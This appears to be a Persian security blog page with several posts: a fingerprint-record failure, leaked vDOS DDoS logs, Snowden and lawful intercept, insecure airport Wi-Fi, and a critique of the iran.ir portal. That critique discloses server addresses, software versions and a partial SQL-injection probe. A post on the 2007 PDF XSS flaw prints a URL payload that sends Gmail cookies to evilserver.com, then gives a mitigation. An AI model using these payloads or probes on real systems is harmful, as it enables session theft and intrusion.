بی‌استفاده بودن انگشت‌نگاری سنتی

قبلا در نوشته شفافیت حکومتی در زیرساخت‌ها در مورد گزارش‌های Daily Open Source Infrastructure گفته بودم. تغییراتی که ۱۱ سپتامبر در زیرساخت دولتی آمریکا (خارج از حکومت حزبی جاری) در طول ۳ دوره گذشته داشته، به نظر من برای خیلی از کشورها (و حتی سازمان ها) می تواند اثر بخش باشد.

امروز (همزمان با استفاده از سیستم اضطراری اطلاع رسانی بی‌سیم بر روی همان لیست پستی ایمیل دیگری ارسال شد با محتوای نقص در سیستم انگشت نگاری فدرال و استفاده ۸۵۸ نفر از این نقصان امنیتی و ورود به آمریکا بعد از اینکه برخی از آن ها با هویت دیگر دیپورت شده بودند. باز هم نکته ای که برای من جالب بود ارایه اطلاعات تقریبا کامل، بیان علت مشکل و ذکر راه حل در نظر گرفته شده برای کم کردن خسارت بود.

کلیات داستان این بوده که بخش زیادی از انگشت نگاری هایی که به صورت سنتی (کاغذی) پیش از سال ۲۰۰۸ اسکن شده بودند به خوبی دیجیتالی نشده بودند و در نتیجه توانایی پیدا کردن افراد رو نداشتند. البته این روزها خوب اثر انگشت خیلی بهتر در آیفون‌ها ذخیره می شود :)) بعدا باید در مورد پروژه پر سر و صدای Next Generation Identification بنویسم.

دوست داشتید بخونید: Potentially Ineligible Individuals Have Been Granted U.S. Citizenship Because of Incomplete Fingerprint Records

rcmp-c216-c-fingerprinting-example

داده‌های منتشر شده از vDOS

سرویس های که vDOS در وب سایت های زیر زمینی و بسیاری از فروم های اینتنرتی مدت ها در حال تبلیغ بود در دو هفته گذشته خبرهای زیادی درست کرده است. درآمد حداقلی ۶۰۰هزار دلاری در دو سال گذشته (از آب کره گرفته) و احتمالا خیلی بیشتر از این (سرویس از سال ۲۰۱۱ در حال خرابکاری بوده است.) باعث اعتماد به نفس صاحبان سرویس شده بود و بعد از اینکه در خصوص روش های DDOS مقاله ای منتشر کردند باعث شروع ردیابی و بعد هم دستگیری اولیه برای خودشون شدند. هفته گذشته Krebs on Security مطلبی در این خصوص منتشر کرد و با حمایت Cloudflare بخشی از لاگ فایل های این سایت رو نیز منتشر کرد. این لاگ فایل ها برای ۴ ۵ ماه گذشته است و نام کاربری سفارش دهنده، زمان سفارش و آدرس ارسال ترافیک رو در این فایل می تونید پیدا کنید.

متاسفانه این مطلب به روش عجیبی در یک بلاگ فارسی به روشی عجیب بیان شده است و بدون تحلیل کافی فقط چند نام در آن استفاده شده است. خیلی مهمه که توی این مدل افشای اطلاعات بیشتر به دلایل تجاری این کارها فکر کنید (دقت کنید فقط موضوع kiddo بازی نبوده) و مراقب سو استفاده رسانه های خبری هم باشید.

آدرس‌ها و زمان اجرا نیاز به بررسی خیلی دقیق‌تری داره، ولی شاید لازم باشه به جز احتمال حمله و خرابکاری، هدایت ترافیک رو هم در نظر گرفت. به عنوان یک نمونه یک ارتباط غیرقابل اثبات رو حداقل در تاریخ ها میشه دید:

1

مورد عجیب اسنودن

شاید آقای فینچر در سال‌‌های نه‌چندان دور، فیلمی با موضوع ادوارد اسنودن بسازد. شاید هم ادوارد اسنودن ناگهان بیماری عجیبی بگیرد و شروع به پیر شدن کند. شاید هم تونی اسکات و برادران واچوسفکی و آقای فینچیر با هم انقلاب کردند و در مورد انانیموس‌ها فیلم ساختند. در هر صورت این وقایع تبدیل به فیلم بشود یا نشود، واقعی باشند یا نباشند، بد نیست به این موارد فکر کنیم:

  • هر داستان و یا فیلمی، اگر به موضوع داغ و یا پر فروشی تبدیل شود، احتمالا (اگر خیلی تخیلی نیست) ریشه‌هایی از واقعیت‌ها، در آن‌ می‌توان یافت. اگر هنوز واقعی نشده‌اند، شاید هدف و آرزوی دست‌ یافتنی در آن نهاده شده است.
  • آژانس امنیت ملی ایالات متحده آمریکا (که بین همه ملت‌ها به راحتی به NSA هم شناخته می‌شود) نقش مهمی در فیلم‌های تخیلی-جاسوسی دنیا دارد. شاید کتاب‌های زیادی هم این موضوع را بزرگ کرده‌اند. دشمن ملت آقای تونی اسکات و دژ دیجیتال آقای دن بروان شاید مهمترین اثرهایی باشند که به صورت شفاف به نقش جاسوسی NSA از شهروندان آمریکایی اشاره‌های واقعی می‌کنند. در ذهن من، هیچ موضوع خیلی مبهمی در خصوص این دو اثر نیست که در میان حکومت‌های دنیا رایج نباشد.
  • شاید در وب‌فارسی کمتر در این مورد صحبت شده باشد. گزارش‌های قابل قبولی وجود دارد که NSA-FBI به صورت رسمی برای شکستن کدهای AES تلاش می‌کنند. هر چند به ظاهر در بسیاری از موارد، مانند عملیات ساتیاگراها پس از ۱۲ ماه تلاش شکست می‌خورند.
  • قسمتی از بزرگ شدن اسنودن، به خاطر بازی‌های رسانه‌ای است که پیرامون او در حال رخ دادن است. گاردین به وضوح در حال قدرت‌جویی برای خودش است و روسیه هم احتمالا مانند همیشه به فکر تبادل و باج‌گیری.
  • اگر کمی دقت کنید، این موضوع برای هیچ گروهی از افرادی که در حوزه امنیت اطلاعات کار می‌کنند، خیلی عجیب و غیر عادی نیست. تمام افرادی که در زمینه امنیت فعال هستند به راحتی می‌دانند، تمامی حکومت‌ها (توسعه یافته، نیافته، در حال توسعه) تا جایی که بتوانند با اتکا به قوانینی که خودشان وضع کرده‌اند، دست به چنین اقداماتی می‌زنند. پروژه‌هایی مانند پریسم همانقدر نکوهش می‌شوند، که درصد خیلی خیلی کمتری در خصوص شنود موبایل در سال ۸۸ شرکت‌های مخابراتی نکوهش شدند.
  • فرق حکومت‌های توسعه یافته با نیافته و یا در حال توسعه این است که در کشور توسعه یافته بعد از اعلام پریسم، سخنگوی مربوط پشت تریبون قرار می‌گیرد، و با اتکا به قوانین داخلی موضوع را حل می‌کند. به احتمال زیاد، هیچ مرجع قانونی هم نخواهد توانست به چنین پروژه‌ای ایراد بگیرد.
  • شنود و رهگیری قانونی، در تمامی سیستم‌های مخابراتی و اطلاعاتی، در همه جای دنیا در نظر گرفته می‌شود. کلمه قانونی، در این عبارت، بیانگر این است که در محل اجرای موضوع، قانون‌گذار می‌تواند در خصوص شنود و رهگیری، قوانینی وضع کند. جهت اطلاع رسانی توجه شما را به Cisco Architecture for Lawful Intercept in IP Networks یا RFC 3924 جلب می‌کنم.
  • همانطور که معروف است، لازم است متذکر شوم، امنیت، یک افسانه‌ است. به افسانه‌ها احترام بگذارید.

HotSpot در مهرآباد



صبح قبل از پرواز کمتر از ۱۰ دقیقه وقت بود و احساس کردم شاید  فرودگاه مهرآباد هم پیشرفت کرده باشد و  HotSpot قبل از پرواز  را راه اندازی کرده باشد. بنگ! و صفحه ورود هات اسپات داتک ظاهر  شد. به ظاهر از راه حل های  ChilliSpot برای کنترل استفاده می  کنند و سرعت در حد قابل قبولی برای کارهای معمولی موجود بود.  (البته در ساعت تقریبا خلوت شاید خیلی هم خوب نبود.) به هر حال، مطلبی که گفتنش  ضروری به نظر می‌رسد عدم وجود امنیت کافی در این سرویس بود. در اسکرین شات می  توانید مشاهده کنید به سادگی امکان اتصال به سایر کلاینت ها را داشتم و این موضوع به  خوبی قابل توجیه نبود.

از شبکه های WiFi دیگر فرودگاه مهرآباد هم شبکه ترانزیت و کیش ایر هر دوشون با WEP محافظت می شوند که تنها چند دقیقه و کمی حوصله برای آسیب پذیر شدن نیاز دارند.

    – مقدمه ای بر شبکه های بی سیم

    – Pars HotSpot

    – Wireless Hotspot Security

    – Cracking WEP and WPA Wireless Networks

انتقاد هایی به iran.ir

پرتال خدمات الکترونیکی ایران، اسم بسیار بزرگی برای وب سایتی است که به این نام راه اندازی شده است. ایراد گرفتن و انتقاد کردن کار بسیار ساده ای است، آن هم در مورد چیزی که در واقعیت دارای ایراداتی است. بعد از پست ابر کامپیوتر ایرانی که با انتقادات زیادی از  طرف دوستان مواجه شد، قصد ادامه دادن چنین نوشته هایی را نداشتم، ولی اصرار سری  مطالب “iran.ir در آیینه رسانه ها” موجب این نوشته شد.

بعد نوشت: این مطلب، مانند سایر مطالب این وب سایت، بر پایه‌ی نظرات شخصی من  نوشته شده است و هیچ گونه حقی را برای فرد، افراد، گروه و یا سازمانی ایجاد نمی کند. هر  گونه سو استفاده از مطالب این سایت به عهده فرد خاطی است و نگارنده تلاش خود را برای حفظ حریم خصوصی افراد کرده است.

Iran.ir چیست؟

درگاه ( پرتال ) خدمات الکترونیکی ایران با حضور سلیمانی وزیر ارتباطات و فناوری اطلاعات و ریاضی معاونت فناوری اطلاعات وزارت ارتباطات و فناوری ارتباطات، با عنایت  به تبصره ۳ ماده ۲۵ تصمیم نامه شماره ۶۸۰۸۴/ت۳۷۴۵۶ مورخ ۳۱/۴/۸۶ نمایندگان ویژه  رییس جمهور راه اندازی شده است.

این وب سایت، تحت مالکیت dabirkhane shora fanavarie etelaat keshvar به آدرس  scit.ir  (که هم اکنون در دسترس نیست!) آغاز به کار کرده است. اگر به محتوای Iran.ir توجه کنید، بیشتر شبیه یک فهرست اینترنتی + rss reader چند سایت دولتی است تا یک پرتال دولتی.
نمونه های مختلفی از پرتال های دولتی در دنیا راه اندازی شده است، همانطور که می دانید USA.gov، Arizona @ Your Service، Directgov،  SINGOV و National Portal of  India از نمونه های موفقی هستند، که در چند نمونه مشابه تلاش هایی برای پیاده سازی  نسخه ایرانی از آن‌ها شده است.


Iran.ir چگونه راه اندازی شده است؟

صفحه اصلی Iran.ir مجموعه ای از چند جعبه محتوی اخبار و فیدهای XML است که به  صورت افراطی از AJAX برای نمایش محتویات استفاده کرده اند. ساختار محتوایی سایت  برپایه‌ی یک نسخه بسیار سانسورشده از جوملافارسی در آدرس iran.ir/cms است. محتوای  iran.ir/cms با استفاده از نمایش دهنده‌های xml در iran.ir/web نمایش داده می شوند. iran.ir یکی از مهمان ‌های بازه آدرس ۲۱۷٫۲۱۸٫۹۰٫۱ تا ۲۱۷٫۲۱۸٫۹۰٫۱۲۷ است که نمونه های جالبی (مانند  http://217.218.90.108/xampp) بر روی آن یافت می شود.

DNSهای iran.ir که از اعضای همان بازه ذکر شده هستند
، در وضعیت نسبتا مطلوبی به سر می برند و توسط scit.ir راه اندازی شده اند. وب سرور اصلی به آدرس ۲۱۷٫۲۱۸٫۹۰٫۲۰ با استفاده از  CentOS (احتمالا بدون به روز رسانی) با php 5.1.6 (مربوط به حدود یک سال پیش) سرویس دهی می کند.

چرا از Iran.ir انتقاد می کنم؟

در مرور راه اندازی وب سایت Iran.ir اشاره‌های کوچکی کردم، با این امید که مسولین این  پایگاه این نوشته را خواهند دید، نظراتم را در فهرست زیر مرور می کنم:

    – یک پرتال دولتی، نمونه‌ی بسیار دقیقی از یک پرتال اطلاعاع رسانی و Service Oriented است، که مهمترین هدف آن ایجاد یک نقطه دسترسی بی نقص برای مخاطبان آن دولت است. مخاطبان به طور کلی شامل چهار دسته شهروندان حقیقی، شهروندان حقوقی، کارکنان دولتی و بازدیدکنندگان غیربومی می شوند. نوع اطلاعات مورد نیاز هر دسته و سرویس های قابل ارایه برای هر دسته، می بایست از اولین فاز های شکل گیری (به نظر من از فاز صفر) در طراحی پرتال دولتی مورد توجه قرار بگیرد. این یکی از بزرگترین نقص هایی است که در iran.ir مشاهده می کنم. (هر چند ممکن است چنین دسته بندی در نظر گرفته شده باشد و یا در نظر گرفته شود، ولی با توجه به “پورتال خدمات الکترونیکی ایران راه اندازی شد” این پرتال وارد مرحله بهره برداری شده است.)

    – جوملا (بر پایه‌ی مامبو) یکی از بهترین CMSهای موجود است. جوایز و انتشارات متعدد پیرامون جوملا نشانه ای بر کیفیت این ابزار Open Source و پرطرفدار است. به شخصه  جوملا/مامبو را در بیشتر از ۱۰ پروژه تحت وب استفاده کرده ام و تقریبا همیشه با رضایت  مشتریانم مواجه شده ام. اما همیشه معتقد بوده ام استفاده از جوملا برای پایه ریزی یک  Enterprise Portal کاری منجر به شکست است. در iran.ir جوملا به عنوان یکی از هسته های اصلی سایت استفاده شده است، که این کار به نظر شخصی من در آینده ای نه چندان دور باعث بروز مشکلاتی خواهد شد. همانطور که می‌دانید جوملا در سطح امنیت یک وب سایت ملی و دولتی، شاید دچار کاستی ها و نواقصی باشد که هر از چند گاهی باعث بروز مشکلاتی می شود. البته می‌بایست عنوان کرد بسته اصلی Joomla در  وضعیت امنیتی خوبی به سر می‌برد. (به شرط آنکه جوملافارسی هم به موقع به روز شود.)

    – با توجه به دو مورد بالا، خلاصه می‌توان بیان کرد که این وب سایت، در حال حاضر  قابلیت پیاده سازی سیستم های یکپارچه سازی اطلاعات را نخواهد داشت، و یا اگر داشته  باشد، سیستم EAI پیاده سازی شده بر اساس استانداردهای تولیدکنندگان مطرح نخواهد بود.

    – امنیت این پرتال دولتی، جای تحقیق بیشتری دارد، ولی در اولین بررسی ها، قسمتی از سایت که توسعه داده شده بود، دارای بیشتر از ۱۹ آسیب پذیری (XSS و SQL Injection) است. به موارد بیشتر اشاره نمی کنم، اما دقت کنید به:

suggest=y&catid=%27&name=111-222-…@address.com&
email=111-222-..@address.com&
site=111-222-…@address.com&
title=111-222-..@address.com&note=111-222-1933email@address.com&
keyword=111-222-…@address.com&
submit=…..

    – قدیم ها (۲٫۵ سال پیش) مطلبی از روی خشم نوشته بودم، که جمله‌ی معروفی در زمان خودش داشت. با گردش روزگار به نحوی در جریان کار هرسه دیتا سنتر ذکر شده در  آن نوشته قرار گرفتم. (در جریان طراحی یکی از آن ها هم نقش هایی داشتم.) دوستی در آن روزگار توضیح خیلی خوبی برای آن نوشته آورد. شروع به کار Iran.ir بسیار نیکوست، ولی نقطه شروع شرایط لازم برای پرش کافی را ندارد. شاید این شروع با هزینه بسیار زیادی هم انجام شده باشد، ولی این هزینه، با کافی نبودن ارتفاع سکوی پرش، منجر به سقوط دردناکی می تواند باشد.

ابتدا تو را نادیده می گیرند ، سپس مسخره ات می  کنند و بعد با تو می جنگند ولی درنهایت پیروزی از آن توست ( گاندی ) دوستان طولانی ترین راه رو هم با قدم اول باید شروع کرد . امروز عقبیم ولی مطمئنا اگه شروع نکنیم فردا عقب تر.

    – و به عنوان آخرین بند، انتقادی است که به استفاده از انگپلیش در قسمت های مختلف  مربوط به سایت دارم. (dabirkhane shora fanavarie etelaat keshvar؟؟؟؟)

آسیب پذیری XSS در نمایش فایل های PDF

شروع سال ۲۰۰۷ همراه با خبرهای جالبی در دنیای امنیت کامپیوتری بود. تابستان امسال، ماه ایرادهای مرورگرها بود. پاییز ماه ایراد کرنل و این بار نوبت به Mac OS X رسیده است. آخرین نمونه از این خبرهای جالب آسیب پذیری در نمایش فایل های PDF است. این آسیب پذیری جدید و خطرناک امکان اجرای کدهای جاوا اسکریپت بر روی کامپیوتر شما بدون هیچ محدودیتی فراهم می کند. قالب کلی روش اجرای چنین کدی برای یک فایل PDF در یک وب سرور به این صورت است :

http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here

برای یک مثال واقعی، می توانید پس از وارد شدن به حساب Google/Gmail خود از آدرس زیر بازدید کنید:

http://mail.google.com/mail/help/docs/
Gmail_shortcuts.pdf#blah=javascript:alert(document.cookie);

آنچه خروجی این آدرس خواهد بود، برابر document.cookie حساب Gmail شما است، که برابر با session جاری شما خواهد بود. این session را می توان با هدایت به یک اسکریپت دزدید و در این صورت حساب شما مورد تهدید قرار خواهد گرفت. نمونه خطرناکتر آدرس بالا را می توان این گونه بیان کرد:

http://mail.google.com/mail/help/docs/Gmail_shortcuts.pdf#blah=javascript:
document.location=’http://evilserver.com/capturecookie.cgi?cookie=’+
document.cookie;

این سناریو، تنها نمونه ای است، که آسیب پذیری جدید نمایش فایل های PDF می تواند برای شما ایجاد کند. این نقص، به این صورت عمل می کند که فایل های PDF بدون هیچ دلیلی توانایی اجرای کدهای جاوا اسکریپت را دارا هستند. نکته قابل تامل در این نقص، این است که هیچ نیازی به وجود دسرسی ویژه ای برای آن فایل وجود ندارد و ابزار لازم برای شروع یک حمله، تنها وجود یک فایل PDF بر روی یک وب سرور است. با توجه به نوع این نقص امکان فیلتر کردن آن بر روی برنامه های وب سرور تقریبا وجود ندارد. اگر از مرورگر فایرفاکس استفاده می کنید، در حال حاضر سریعترین روش برای جلوگیری از بروز تهدید، غیرفعال کردن نمایش فایل های PDF در مرورگر است. به این روش این کار را می توانید انجام دهید :

Firefox->Tools->Options->Content->Manage->change PDF action to “Save todisk”.

برای اطلاعات بیشتر در این مورد می توانید به نوشته Adobe Acrobat JavaScript Execution Bug is a Huge Security Issue مراجعه کنید. شروع اصلی بحث در لیست webappsec همچنان در حال ادامه است. مراجعه کنید به Universal XSS with PDF files: highly dangerous برای دیدن نظرات مختلف در این مورد. نوشته GNUCITIZEN در این مورد | نوشته ha.ckers در مورد PDF XSS